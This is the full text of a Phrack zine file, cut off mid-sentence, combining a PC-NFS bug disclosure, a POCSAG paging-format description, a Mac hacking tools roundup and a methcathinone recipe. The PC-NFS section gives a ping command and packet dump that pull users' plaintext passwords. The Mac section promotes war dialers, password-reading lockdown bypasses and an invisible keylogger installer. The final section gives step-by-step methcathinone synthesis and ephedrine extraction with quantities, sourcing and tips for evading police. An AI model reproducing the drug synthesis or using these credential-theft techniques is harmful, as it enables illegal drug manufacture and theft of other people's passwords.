==Phrack Magazine== Volume Seven, Issue Forty-Eight, File 3 of 18 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== Part I ------------------------------------------------------------------------------ PC-NFS Bug I have found a nice little security hole in PC-NFS version 5.x. If you ping a PC-NFS user with a packet size of between 1450 to 1480, the PC's ICMP reply packet will divulge: o The hostname of the PC o The hostname of the PC's authentication server o The username of the person logged in o The password for the user (Thank you very much!) All of this information is in clear text unless PC-NFS's NETLOGIN is used. NETLOGIN uses XOR as its encryption, so this is hardly secure either. NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested and all freely return the above information on both PC-NFS versions 5.0 and 5.1a. This should work with other driver/NIC configurations also. You get the occasional added bonus of locking up the victims PC as well! This bug was new to Sun and they have created a new PCNFS.SYS driver for us. They have labeled it PC-NFS.SYS version 5.1a.DOD. This new version fills reply ICMP packets with nulls after 200 bytes of the requested pattern. Until you receive this patch from Sun, I would recommend setting all external router interface MTU to a value of no greater than 1350 as this is point where secrets are contained in the return packet. The Unix command to generate the below results is as follows: ping -s -c1 pchost.victim.com 1480 Use your favorite sniffer to filter ICMP packets and you have it. If you don't have a sniffer, try the -v(erbose) option of ping and convert the hex to ascii starting around byte 1382. Sniffer output follows: 19:03:48.81 ip: evil.com->pchost.victim.com icmp: echo request 62: 024 025 026 027 030 031 032 033 034 035 72: 036 037 ! " # $ % & ' 82: ( ) * + , - . / 0 1 92: 2 3 4 5 6 7 8 9 : ; 102: < = > ? @ A B C D E 112: F G H I J K L M N O 122: P Q R S T U V W X Y 132: Z [ \ ] ^ _ ` a b c 142: d e f g h i j k l m 152: n o p q r s t u v w 162: x y z { | } ~ 177 200 201 172: 202 203 204 205 206 207 210 211 212 213 182: 214 215 216 217 220 221 222 223 224 225 192: 226 227 230 231 232 233 234 235 236 237 202: 240 241 242 243 244 245 246 247 250 251 212: 252 253 254 255 256 257 260 261 262 263 222: 264 265 266 267 270 271 272 273 274 275 232: 276 277 300 301 302 303 304 305 306 307 242: 310 311 312 313 314 315 316 317 320 321 252: 322 323 324 325 326 327 330 331 332 333 262: 334 335 336 337 340 341 342 343 344 345 272: 346 347 350 351 352 353 354 355 356 357 282: 360 361 362 363 364 365 366 367 370 371 292: 372 373 374 375 376 377 000 001 002 003 302: 004 005 006 007 010 011 012 013 014 015 312: 016 017 020 021 022 023 024 025 026 027 322: 030 031 032 033 034 035 036 037 ! 332: " # $ % & ' ( ) * + 342: , - . / 0 1 2 3 4 5 352: 6 7 8 9 : ; < = > ? 362: @ A B C D E F G H I 372: J K L M N O P Q R S 382: T U V W X Y Z [ \ ] 392: ^ _ ` a b c d e f g 402: h i j k l m n o p q 412: r s t u v w x y z { 422: | } ~ 177 200 201 202 203 204 205 432: 206 207 210 211 212 213 214 215 216 217 442: 220 221 222 223 224 225 226 227 230 231 452: 232 233 234 235 236 237 240 241 242 243 462: 244 245 246 247 250 251 252 253 254 255 472: 256 257 260 261 262 263 264 265 266 267 482: 270 271 272 273 274 275 276 277 300 301 492: 302 303 304 305 306 307 310 311 312 313 502: 314 315 316 317 320 321 322 323 324 325 512: 326 327 330 331 332 333 334 335 336 337 522: 340 341 342 343 344 345 346 347 350 351 532: 352 353 354 355 356 357 360 361 362 363 542: 364 365 366 367 370 371 372 373 374 375 552: 376 377 000 001 002 003 004 005 006 007 562: 010 011 012 013 014 015 016 017 020 021 572: 022 023 024 025 026 027 030 031 032 033 582: 034 035 036 037 ! " # $ % 592: & ' ( ) * + , - . / 602: 0 1 2 3 4 5 6 7 8 9 612: : ; < = > ? @ A B C 622: D E F G H I J K L M 632: N O P Q R S T U V W 642: X Y Z [ \ ] ^ _ ` a 652: b c d e f g h i j k 662: l m n o p q r s t u 672: v w x y z { | } ~ 177 682: 200 201 202 203 204 205 206 207 210 211 692: 212 213 214 215 216 217 220 221 222 223 702: 224 225 226 227 230 231 232 233 234 235 712: 236 237 240 241 242 243 244 245 246 247 722: 250 251 252 253 254 255 256 257 260 261 732: 262 263 264 265 266 267 270 271 272 273 742: 274 275 276 277 300 301 302 303 304 305 752: 306 307 310 311 312 313 314 315 316 317 762: 320 321 322 323 324 325 326 327 330 331 772: 332 333 334 335 336 337 340 341 342 343 782: 344 345 346 347 350 351 352 353 354 355 792: 356 357 360 361 362 363 364 365 366 367 802: 370 371 372 373 374 375 376 377 000 001 812: 002 003 004 005 006 007 010 011 012 013 822: 014 015 016 017 020 021 022 023 024 025 832: 026 027 030 031 032 033 034 035 036 037 842: ! " # $ % & ' ( ) 852: * + , - . / 0 1 2 3 862: 4 5 6 7 8 9 : ; < = 872: > ? @ A B C D E F G 882: H I J K L M N O P Q 892: R S T U V W X Y Z [ 902: \ ] ^ _ ` a b c d e 912: f g h i j k l m n o 922: p q r s t u v w x y 932: z { | } ~ 177 200 201 202 203 942: 204 205 206 207 210 211 212 213 214 215 952: 216 217 220 221 222 223 224 225 226 227 962: 230 231 232 233 234 235 236 237 240 241 972: 242 243 244 245 246 247 250 251 252 253 982: 254 255 256 257 260 261 262 263 264 265 992: 266 267 270 271 272 273 274 275 276 277 1002: 300 301 302 303 304 305 306 307 310 311 1012: 312 313 314 315 316 317 320 321 322 323 1022: 324 325 326 327 330 331 332 333 334 335 1032: 336 337 340 341 342 343 344 345 346 347 1042: 350 351 352 353 354 355 356 357 360 361 1052: 362 363 364 365 366 367 370 371 372 373 1062: 374 375 376 377 000 001 002 003 004 005 1072: 006 007 010 011 012 013 014 015 016 017 1082: 020 021 022 023 024 025 026 027 030 031 1092: 032 033 034 035 036 037 ! " # 1102: $ % & ' ( ) * + , - 1112: . / 0 1 2 3 4 5 6 7 1122: 8 9 : ; < = > ? @ A 1132: B C D E F G H I J K 1142: L M N O P Q R S T U 1152: V W X Y Z [ \ ] ^ _ 1162: ` a b c d e f g h i 1172: j k l m n o p q r s 1182: t u v w x y z { | } 1192: ~ 177 200 201 202 203 204 205 206 207 1202: 210 211 212 213 214 215 216 217 220 221 1212: 222 223 224 225 226 227 230 231 232 233 1222: 234 235 236 237 240 241 242 243 244 245 1232: 246 247 250 251 252 253 254 255 256 257 1242: 260 261 262 263 264 265 266 267 270 271 1252: 272 273 274 275 276 277 300 301 302 303 1262: 304 305 306 307 310 311 312 313 314 315 1272: 316 317 320 321 322 323 324 325 326 327 1282: 330 331 332 333 334 335 336 337 340 341 1292: 342 343 344 345 346 347 350 351 352 353 1302: 354 355 356 357 360 361 362 363 364 365 1312: 366 367 370 371 372 373 374 375 376 377 1322: 000 001 002 003 004 005 006 007 010 011 1332: 012 013 014 015 016 017 020 021 022 023 1342: 024 025 026 027 030 031 032 033 034 035 1352: 036 037 ! " # $ % & ' 1362: ( ) * + , - . / 0 1 1372: 2 3 4 5 6 7 8 9 : ; 1382: < = > ? @ A B C D E 1392: F G H I J K L M N O 1402: P Q R S T U V W X Y 1412: Z [ \ ] ^ _ ` a b c 1422: d e f g h i j k l m 1432: n o p q r s t u v w 1442: x y z { | } ~ 177 200 201 1452: 202 203 204 205 206 207 210 211 212 213 1462: 214 215 216 217 220 221 222 223 224 225 1472: 226 227 230 231 232 233 234 235 236 237 1482: 240 241 242 243 244 245 246 247 250 251 19:03:48.85 ip: pchost.victim.com->evil icmp: echo reply 62: 024 025 026 027 030 031 032 033 034 035 72: 036 037 ! " # $ % & ' 82: ( ) * + , - . / 0 1 92: 2 3 4 5 6 7 8 9 : ; 102: < = > ? @ A B C D E 112: F G H I J K L M N O 122: P Q R S T U V W X Y 132: Z [ \ ] ^ _ ` a b c 142: d e f g h i j k l m 152: n o p q r s t u v w 162: x y z { | } ~ 177 200 201 172: 202 203 204 205 206 207 210 211 212 213 182: 214 215 216 217 220 221 222 223 224 225 192: 226 227 230 231 232 233 234 235 236 237 202: 240 241 242 243 244 245 246 247 250 251 212: 252 253 254 255 256 257 260 261 262 263 222: 264 265 266 267 270 271 272 273 274 275 232: 276 277 300 301 302 303 304 305 306 307 242: 310 311 312 313 314 315 316 317 320 321 252: 322 323 324 325 000 000 324 005 ^ $ 262: : 004 000 000 000 000 000 000 000 000 272: 036 006 W V P S Q R 016 007 282: 277 ^ $ 213 367 350 X p r c 292: 212 E " < 000 u 005 350 V 003 302: 353 W < 005 u 005 350 W 002 353 312: N < 010 u 007 306 006 325 # 001 322: 353 H < 015 u 007 306 006 325 # 332: 001 353 = < 017 u 007 306 006 325 342: # 001 353 2 < 022 u 005 350 021 352: 002 353 $ < 003 u 005 350 9 003 362: 353 033 < 022 w 017 2 344 213 360 372: 212 204 300 # P 350 225 305 X 353 382: 010 P 270 c 000 350 213 305 X 306 392: 006 205 347 000 Z Y [ X ^ _ 402: 007 037 313 P S Q R U 036 006 412: W V 214 310 216 330 216 300 306 006 422: 325 # 000 373 277 ^ $ 273 A 347 432: 271 006 000 215 6 d $ 212 004 210 442: 005 212 007 210 004 F G C 342 363 452: 241 x $ 243 | $ 241 z $ 243 462: ~ $ 241 324 ) 243 x $ 241 326 472: ) 243 z $ 277 ^ $ 212 E " 482: < 010 u 015 P 270 ` 000 350 $ 492: 305 X 350 275 001 353 022 < 015 u 502: 012 P 270 a 000 350 023 305 X 353 512: 004 < 017 u 003 350 017 000 306 006 522: 205 347 000 ^ _ 007 037 ] Z Y 532: [ X 303 P 270 < 000 350 363 304 542: X 307 E $ 000 000 215 u " 213 552: M 020 206 351 203 351 024 367 301 001 562: 000 t 006 213 331 306 000 000 A 321 572: 371 350 , o 211 ] $ 307 E 030 582: 000 000 215 u 016 271 012 000 350 033 592: o 211 ] 030 213 E 020 206 340 005 602: 016 000 243 ` % 211 > b % 214 612: 016 d % 277 ^ % . 376 006 ? 622: 020 350 9 276 . 376 016 ? 020 303 632: & 213 E 002 013 300 t 020 243 326 642: # & 213 ] 004 211 036 330 # 350 652: 231 m 353 0 200 > 324 ) 000 t 662: 033 & 203 } 006 000 t 024 203 > 672: 326 # 000 u 015 350 031 000 203 > 682: 326 # 000 t 003 350 u m 241 326 692: # & 211 E 002 241 330 # & 211 702: E 004 303 & 213 M 006 006 V W 712: 016 007 272 000 000 277 334 # 350 $ 722: 000 241 323 # 243 350 X 203 > 326 732: # 000 u 023 366 006 343 015 001 u 742: 014 203 > 350 X 000 u 353 272 001 752: 000 342 332 _ ^ 007 303 Q R W 762: 203 372 000 u 021 203 > 030 214 000 772: t 012 276 004 214 271 003 000 363 245 782: 353 010 270 377 377 271 003 000 363 253 792: 276 A 347 271 003 000 363 245 _ 270 802: 377 377 211 E 036 211 E 241 324 812: ) 211 E 032 241 326 ) 211 E 034 822: 270 000 206 340 211 E 020 306 E 832: 016 E 306 E 017 000 307 E 022 000 842: 000 307 E 024 000 000 306 E 026 002 852: 306 E 027 001 307 E 014 010 000 3 862: 300 306 E " 021 210 E # 211 E 872: & 211 E ( 350 250 376 Z Y 303 882: 200 > 326 # 000 u 014 213 E * 892: 243 326 # 213 E , 243 330 # P 902: 270 V 000 350 205 303 X 303 P S 912: Q R 213 E : 213 ] < 213 M 922: & 213 U ( 350 223 k Z Y [ 932: X P 270 \ 000 350 e 303 X 303 942: 306 E " 000 P 270 X 000 350 X 952: 303 X 303 & 213 E 002 & 213 ] 962: 004 & 213 U 006 006 W 016 007 350 972: Y i s 003 351 227 000 277 334 # 982: W 271 003 000 363 245 276 A 347 271 992: 003 000 363 245 _ 211 E 036 211 ] 1002: 241 324 ) 211 E 032 241 326 ) 1012: 211 E 034 270 000 206 340 211 E 1022: 020 306 E 016 E 306 E 017 000 307 1032: E 022 000 000 307 E 024 000 000 306 1042: E 026 377 306 E 027 001 307 E 014 1052: 010 000 3 300 306 E " 010 210 E 1062: # 211 E & 377 006 h % 241 h 1072: % 211 E ( 211 026 350 X 211 026 1082: l % 307 006 j % 000 000 350 322 1092: 375 203 > 350 X 000 t # 366 006 1102: 343 015 001 u ! 203 > j % 000 1112: t 353 203 > j % 001 u 011 241 1122: l % + 006 350 X 353 015 270 375 1132: 377 353 010 270 376 377 353 003 270 377 1142: 377 307 006 l % 000 000 _ 007 & 1152: 211 E 010 303 P 270 ^ 000 350 206 1162: 302 X 203 > l % 000 t 017 213 1172: ] ( ; 036 h % u 006 307 006 1182: j % 001 000 303 P 270 ; 000 350 1192: g 302 X 203 > l % 000 t 006 1202: 307 006 j % 002 000 303 000 000 000 1212: 000 000 000 000 000 000 000 000 000 000 1222: 000 000 000 000 000 000 000 000 000 000 1232: 000 000 000 000 000 000 000 000 000 000 1242: 000 000 000 000 000 000 000 000 002 000 1252: 000 000 300 A 000 000 034 000 000 000 1262: 200 000 000 000 k 000 000 000 000 016 1272: 000 000 000 000 000 000 000 000 000 1282: 010 000 000 000 252 001 000 000 010 5 1292: 000 000 r 027 301 . 000 000 000 000 1302: 036 F 300 . 000 000 000 000 036 F 1312: 300 . 000 000 000 000 000 000 000 000 1322: 000 000 000 000 000 000 000 000 000 000 1332: 000 000 000 000 000 000 000 000 000 000 1342: 000 000 000 000 000 000 000 000 000 1352: 000 000 000 002 000 000 200 366 = 000 1362: { 255 023 000 242 265 015 000 002 000 1372: 000 000 S 017 005 000 C 003 000 000 1382: p c h o s t 000 000 000 000 1392: 000 000 000 000 000 000 244 A @ - 1402: s e r v e r 1 000 000 000 1412: 000 000 000 000 000 000 244 A @ 001 1422: 000 000 000 000 000 000 000 000 000 000 1432: 000 000 000 000 000 000 244 A @ 001 1442: u s e r n a m e 000 000 1452: p a s s w d 000 000 000 000 1462: 000 000 000 000 000 000 000 000 000 000 1472: 000 000 000 000 000 000 000 000 000 000 1482: 000 000 200 000 k 000 260 271 377 377 1492: 344 275 9 212 The names have been changed to protect the innocent, but the rest is actual. Byte 1382: PC's hostname Byte 1402: PC's Authentication server hostname Byte 1382: The user's account name. Shows nobody if logged out. Byte 1382: The user's password. ------------------------------------------------------------------------------ POCSAG paging format, code and code capacity The POCSAG (Post Office Code Standardization Advisory Group) code is a synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH structure. The POCSAG codes provides improved battery-saving capability and an increased code capacity. The POCSAG code format consists of a preamble and one or more batches of codewords. Each batch comprises a 32-bit frame synchronization code and eight 64-bit address frames of two 32-bit addresses or idle codewords each. The frame synchronization code marks the start of the batch of codewords. -PREAMBLE STRUCTURE The preamble consists of 576 bits of an alternating 101010 pattern transmitted at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to determine if the data received is a POCSAG signal and for synchronization with the stream of data. |---Preamble----|-----------First Batch-------------|--Subsec. Batch--| ______________________________________________________< <____________ paging | 576 bits of | | | | | | | | | | | > > | format | reversals |F| | | | | | | | | | | | | | | | |F| | | (101010, etc) |S| | | | | | | | | | | | | | | | |S| | |_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________| > > 1 FRAME = 2 CODEWORDS Preamble Batchs 512 BPS 1125 mS 1062.5 mS 1200 BPS 480 mS 453.3 mS CodeWords Structure ____________________________________________________________________ BIT | | | | | | NUMBER | 1 | 2 to 19 | 20,21 | 22 to 31 | 32 | |___|______________|_______|_______________________|_________________| ____________________________________________________________________ ADDRESS| | | | | | FORMAT | 0 | Address Bits | S I B | Parity Check Bits | Even parity | |___|______________|_______|_______________________|_________________| ^ Source identifier bits ____________________________________________________________________ MESSAGE| | | | | FORMAT | 1 | Message Bits | Parity Check Bits | Even parity | |___|______________________|_______________________|_________________| -BATCH STRUCTURE A batch consist of frame synchronization code follow by 8 frames of two address codewords per frame (16 address codewords per batch). In order to maintain the proper batch structure, each frame is filled with two address codewords, or two idle codewords, or two message codewords, or any appropriate combination of the three codewords types. -FRAME SYNCHRONIZATION CODE STRUCTURE The frame synchronization (FS) code is a unique, reserved word that is used to identify the beginning of each batch. The FS code comprises the 32 bits: 011111100110100100001010111011000. -OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS An alternate frame synchronization (AFS) code can be selected to support special systems or systems that require increased coding capability. The AFS is generated in the same manner as an address codeword (i.e., BCH codeword with parity bits). The POCSAG signaling standard has reserved special codewords for the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging system to support the AFS. The AFS will change to frame 0 on the programmer since no frame information is included in the AFS. The AFS should use address 1 so that bit 20 and 21 are 0. -ADDRESS CODEWORD STRUCTURE An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are the address bits. The pagers looks at these bits to find its own unique address. Each POCSAG codeword is capable of providing address information for four different paging sources (Address 1 to 4). These address are determined by combinations of values of bits 20 and 21 ( the source-identifier bits). Bits 22 through 31 are the parity check bits, and bit 32 is the even parity bit. BIT 20 BIT 21 Address 1 0 0 Address 2 0 1 Address 3 1 0 Address 4 1 1 Pre-coded into the code plug are three bits which designate the frame location, within each batch, at which the pager's address is to be received; the decoder will look at the codewords in this frame for its address. Power is removed from the receiver during all frames other than the precoded one, thus extending pager battery life. -CODE CAPACITY The combination of the code plug's three pre-coded frame location bits and address codeword's 18 address bits provides over two million different assignable codes. In this combination, the frame location bits are the least-significant bits, and the addres s bits are the most-significant bits. -MESSAGE CODEWORD STRUCTURE A message codeword structure always start with a 1 in bit 1 and always follows directly after the address. Each message codeword replaces an address codeword in the batch. -IDLE CODEWORD STRUCTURE The idle codeword is unique, reserved codeword used to talk place of an address in any frame that would not otherwise be filled with 64 bits. Thus, if a frame contains only an address, an idle codeword comprises the 32 bits: 01111010100010011100000110010111 -POCSAG CHARACTERS CHAR HEX | CHAR HEX | CHAR HEX | | | | # 23 | $ 24 | @ 40 | [ 5B | \ 5C | ] 5D | ^ 5E | _ 5F | ' 60 | { 7B | | 7C | } 7D | ~ 7E | DEL 7F | SP 20 | ------------------------------------------------------------------------------ MACINTOSH HACKING by Logik Bomb "My fellow astronauts..." -Dan Quayle Now, two people have mailed Erik Bloodaxe asking about Macintosh hacking particularly war dialers, and each time he insulted Macs and tried to get someone to write a file on it. No one has done it. So I guess I have to. First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the originators of the Apple and the Macintosh were busted for phreaking in college. The Apple IIe was used almost universally by hackers. So why has the Mac fallen out of favor for hacking? Simple. Because it fell out of favor for everything else. Apple screwed up and wouldn't let clone makers license the MacOS. As a result, 80% of personal computers run DOS, and Macintoshes are left in the minority. Second, DOS compatible users, and hackers in particular, have an image of Mac users as a bunch of whiny lamers who paid too much for a computer and as a result are constantly defensive. The solution to this impression is to not be an asshole. I know it drives every Mac user crazy when he reads some article about Windows 95's brand new, advanced features such as "plug-and-play" that the Macintosh has had since 1984. But just try and take it. If it's any consolation, a lot of IBM-compatible (a huge misnomer, by the way) users hate Windows too. Now, on with the software. ------------------------- Assault Dialer 1.5 Assault Dialer, by Crush Commando, is the premier Mac war dialer, the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we have right now. It is the successor to a previous war dialer known as Holy War Dialer 2.0. The only real competitor I've heard of for Assault Dialer is Tyrxis Shockwave 2.0, but the only version I could get a hold of was 1.0, and it wasn't as good as Assault Dialer, so that's your best bet right now. MacPGP 2.6.2 and PGPfone 1.0b4 MacPGP is the Macintosh port of the infamous PGP (Pretty Good Privacy.) This file is not about cryptography, so if you want to know about PGP read the fuckin' read me and docs that come with the file. Strangely enough, however, Phil Zimmerman released PGPfone, a utility for encrypting your phone and making it a secure line, for the Mac _first._ I don't know why, and I haven't had a chance to test it, but the idea's pretty cool. If PGP doesn't get Zimmerman thrown in jail, this will. DisEase 1.0 and DisEase 3.0 Schools and concerned parents have always had a problem. Schools can't have students deleting the hard drive, and parents don't want their kids looking at the kinky pictures they downloaded. So Apple came out with At Ease, an operating system that runs over System 7, sort of the same way Windows runs off of DOS. However, I can't stand At Ease. Everything about it, from the Fisher-Price screen to the interface drives me crazy. It drives a lot of other people crazy too. So it was just a matter of time before someone made a program to override it. The first was DisEase 1.0, a small program by someone calling himself Omletman, that would override At Ease if you put in a floppy loaded with it and clicked six times. Omletman improved this design and eventually released 3.0. (I haven't been able to find any evidence that a 2.0 was ever released) 3.0 has such cool features as reading the preferences file to give you the password, so you can change the obnoxious greeting teachers always put to something more sinister. The only problem with 3.0 is that some configurations of At Ease only let documents be read off of disks; no applications, which means DisEase 3.0 won't appear, and so you can't run it. However, with 1.0 you don't have to actually open the application, you just click six times, so if you use 1.0 to get to the finder, and then 3.0 to read the passwords, things will work. Invisible Oasis Installer Oasis is a keystroke recorder, so you can find out passwords. However, with the original Oasis, you had to put it in the Extensions folder and make it invisible with ResEdit, which takes a while. Invisible Oasis Installer, however, installs it where it should be and automatically makes it invisible. "So everything's wrapped up in a nice neat little _package_, then?" -Homer Simpson Anonymity 2.0 and Repersonalize 1.0 Anonymity, version 1.2, was a rather old program whose author has long been forgotten that was the best data fork alterer available. It removed the personalization to programs. However, in around 1990 someone named the Doctor made 2.0, a version with some improvements. Repersonalize was made in 1988 (God, Mac hacking programs are old) which reset personalization on some of the Microsoft and Claris programs, so you could enter a different personalization name. I don't know if it will still work on Microsoft Word 6.0.1 and versions of programs released recently, but I don't really care because I use Word 5.1a and I'm probably not going to upgrade for a while. Phoney (AKA Phoney4Mac) Phoney is an excellent program that emulates the Blue Box, Red Box, Black Box and Green Box tones. There is also Phoney4Newton, which does the same thing on the most portable of computers, the Newton. That's all I'm covering in this file as far as Mac hacking programs. You'll probably want to know where to find all this crap, so here are all of the Mac hacking ftp and Web sites I know of: Space Rogue's Whacked Mac Archives (http://l0pht.com/~spacerog/index.html) This site, run by Space Rogue is L0pht Heavy Industries' Mac site. It is probably the largest and best archive of Mac hacking software connected to the Internet. The problem with this is that it can't handle more than two anonymous users, meaning that unless you pay to be part of L0pht, you will never get into this archive. I've tried getting up at 4:30 AM, thinking that no one in their right mind would possibly be awake at this time, but there is always, somehow, somewhere, two people in Iceland or Singapore or somewhere on this site. The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html) This site does not look like much, and it is fairly obvious that its maintainer, Sean Warren, is still learning HTML, but it is reliable and is a good archive. It is still growing, probably due to the fact that it is one of the only Internet Mac hacking sites anyone can get to and upload. Kn0wledge Phreak (http://www.uccs.edu/~abusby/k0p.html) This is an excellent site and has many good programs. There is one catch, however. It's maintainer, Ole Buzzard, is actually getting the files from his BBS. So many of the really good files are locked away in the k0p BBS, and those of us who can't pay long distance can't get the files. Oh well. Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page (http://www.lib.iup.edu/~seaman/index.html) While this is hardly a Macintosh hacking site, it's just a hacking site, it does have very few Mac files, some of which are hard to get to. However, Bone might get expelled because of a long story involving AOHell, so this page might not be here. Then again, maybe Bone won't get expelled and this site will stay. Never can tell 'bout the future, can you? "We predict the future. We invent it." -Nasty government guy on the season premiere of _The X-Files_ Andy Ryder Netsurfer and Road Warrior on the Info Highway I've pestered Bruce Sterling _and_ R.U. Sirius! As mentioned in the alt.devilbunnies FAQ, part I (Look it up!) Once scored 29,013,920 points on Missile Command "This Snow Crash thing- is it a virus, a drug, or a religion?" -Hiro Protagonist "What's the difference?" -Juanita Marquez "...one person's 'cyberpunk' is another's everyday obnoxious teenager with some technical skill thrown in..." -Erich Schneider, "alt.cyberpunk Frequently Asked Questions List" "More than _some_ technical skill." -Andy Ryder ------------------------------------------------------------------------------ Making Methcathinone Compiled by Anonymous Ok, this has got to be the easiest drug made at home (by far). This is very similar to methamphetamine in structure, effect, and use. Typical doses start at 20mg up to 60mg. Start low, go slow. Cat can be taken orally (add 10 mg) or through mucous membranes (nasally). Ingredients: Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine. Potassium chromate, or dichromate (easily gotten from chem lab. orange/red) Conc. Sulfuric acid - it's up to you where you get this. Contact me if you need help locating it. Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it is used for cleaning concrete. Sodium Hydroxide - Hardware stores. AKA lye. Toluene - Hardware store, paint store. Lab equipment: 1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00) 125 mL separatory funnel - same as above glass tubing - same as above Buchner funnel - This is a hard to find item, but must schools have at least one. They are usually white porcelain or plastic. They look like a funnel with a flat disk in the bottom with lots of holes in it. If you need one, arrangements can be made. Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00 References to Edmund's Scientific Co, in NJ, are accurate. You have to go to their "Lab Surplus/Mad Scientist" room. The prices are incredible. This place is definitely a recommended stopping sight for anybody going through New Jersey. It is located in "Barrington", about 30 minutes from center city Philadelphia. All of the above can be purchased from "The Al-Chymist". Their number is (619)948-4150. Their address is: 17525 Alder #49 Hesperia, Ca 92345 Call and ask for a catalog. That's it. The body of this article is stolen from the third edition of "Secrets of Methamphetamine Manufacture" by Uncle Fester. This is a tried and proven method by many people. If you want a copy of this book, contact me. Good luck and keep away from the DEA M E T H C A T H I N O N E K I T C H E N I M P R O V I E S E D C R A N K The latest designer variant upon the amphetamine molecule to gain popularity and publicity is methcathinone, commonly called cat. This substance is remarkably similar to the active ingredient found in the leaves of the khat tree which the loyal drug warriors on the network news blame for turning peace loving Somalis into murderous psychopaths. The active ingredient in the khat leaves is cathinone, which has the same structural relationship to methcathinone that amphetamine has to methamphetamine. It is made by oxidizing ephedrine, while meth can be made by reducing ephedrine. The high produced by methcathinone is in many ways similar to methamphetamine. For something so easily made and purified, it is actually quite enjoyable. the main differences between the meth high and the methcathinone high are length of action and body fell. With methcathinone, one can expect to still get to sleep about 8 hours after a large dose. On the down side, it definitely gives me the impression that the substance raises the blood pressure quite markedly. This drug may not be safe for people with weak hearts of blood vessels. Be warned! Cat is best made using chrome in the +6 oxidation state as the oxidizer. I recall seeing an article in the narco swine's Journal of Forensic Science bragging about how they worked out a method for making it using permanganate, but that method gives an impure product in low yields. Any of the common hexavalent chrome salts can be used as the oxidizer in this reaction. This list include chrome trioxide (CrO3), sodium or potassium chromate (Na2CrO4), and sodium or potassium dichromate (Na2Cr2O7). All of these chemicals are very common. Chrome trioxide is used in great quantities in chrome plating. The chromates are used in tanning and leather making. To make methcathinone, the chemist starts with the water extract of ephedrine pills. The concentration of the reactants in this case is not critically important, so it is most convenient to use the water extract of the pills directly after filtering without any boiling away of the water. See the section at the beginning of Chapter 15 [I included this at the end of the file] on extracting ephedrine form pills. Both ephedrine hydrochloride and sulfate can be used in this reaction. The water extract of 1000 ephedrine pills is placed into any convenient glass container. A large measuring cup is probably best since it has a pouring lip. Next, 75 grams of any of the above mentioned +6 chrome compounds are added. They dissolve quite easily to form a reddish or orange colored solution. Finally, concentrated sulfuric acid is added. If CrO3 is being used, 21 mL is enough for the job. If one of the chromates is being used, 42 mL is called for. These ingredients are thoroughly mixed together, and allowed to sit for several hours with occasional stirring. After several hours have passed, lye solution is added to the batch until it is strongly basic. Very strong stirring accompanies this process to ensure that the cat is converted to the free base. Next, the batch is poured into a sep funnel, and a couple hundred mLs of toluene is added. Vigorous shaking, as usual, extracts the cat into the toluene layer. It should be clear to pale yellow in color. The water layer should be orange mixed with green. The green may settle out as a heavy sludge. The water layer is thrown away, and the toluene layer containing the cat is washed once with water, then poured into a beaker. Dry HCl gas is passed through the toluene as described in Chapter 5 [I included this at the end of the file] to get white crystals of cat. The yield is between 15 and 20 grams. This reaction is scaled up quite easily. CHAPTER 15 (part of it anyway) P R O C E D U R E F O R O B T A I N I N G P U R E E P H E D R I N E F R O M S T I M U L A N T P I L L S In the present chemical supply environment, the best routes for making meth start with ephedrine as the raw material. To use these routes, a serious hurdle must first be overcome. This hurdle is the fact that the most easily obtained source of ephedrine, the so-called stimulant or bronchodilator pills available cheaply by mail order, are a far cry from the pure starting material a quality minded chemist craves. Luckily, there is a simple and very low profile method for separating the fillers in these pills from the desired active ingredient they contain. A superficial paging through many popular magazines[New Body is where I found it at GNC] reveals them to be brim full of ads from mail order outfits offering for sale "stimulant" or "bronchodilator" pills. These are the raw materials today's clandestine operator requires to manufacture meth without detection. The crank maker can hide amongst the huge herd of people who order these pills for the irritating and nauseating high that can be had by eating them as is. I have heard of a few cases where search warrants were obtained against people who ordered very large numbers of these pills, but I would think that orders of up to a few thousand pills would pass unnoticed. If larger numbers are required, maybe one's friends could join in the effort. The first thing one notices when scanning these ads is the large variety of pills offered for sale. When one's purpose is to convert them into methamphetamine, it is very easy to eliminate most of the pills offered for sale. Colored pills are automatically rejected because one does not want the coloring to be carried into the product. Similarly, capsules are rejected because individually cutting open capsules is just too much work. Bulky pills are to be avoided because they contain too much filler. The correct choice is white cross thins, preferably containing ephedrine HCl instead of sulfate, because the HCl salt can be used in more of the reduction routes than can the sulfate. Once the desired supply of pills is in hand, the first thing which should be done is to weigh them. This will give the manufacturer an idea of how much of the pills is filler, and how much is active ingredient. Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle contains 25 grams of active ingredient. A good brand of white cross thins will be around 33% to 40% active ingredient. 25 grams of ephedrine HCl may not sound like much, but if it is all recovered from these pills, it is enough to make from 1/2 to 3/4 ounce of pure meth. This is worth three or four thousand dollars, not a bad return on the twenty odd dollars a thousand lot of such pills costs. [I don't know where he got 3 or 4 thousand dollars from, but the pills go for about $35.00/1000 now. 2 months ago they were $25.00 but now they have to do more paper work because it is a DEA controlled substance] To extract the ephedrine from the pills, the first thing which must be done is to grind them into a fine powder. This pulverization must be thorough in order to ensure complete extraction of the ephedrine form the filler matrix in which it is bound. A blender does a fine job of this procedure, as will certain brands of home coffee grinders. Next, the powder from 1000 pills is put into a glass beaker, or other similar container having a pouring lip, and about 300 mL of distilled water is added. Gentle heat is then applied to the beaker, as for example on a stove burner, and with steady stirring the contents of the beaker are slowly brought up to a gentle boil. It is necessary to stir constantly because of the fillers will settle to the bottom of the beaker and cause burning if not steadily stirred. Once the contents of the beaker have been brought to a boil, it is removed from the heat and allowed to settle. Then the water is poured out of the beaker through a piece of filter paper. The filtered water should be absolutely clear. Next, another 50 mL of water is added to the pill filler sludge, and it too is heated with stirring. Finally, the 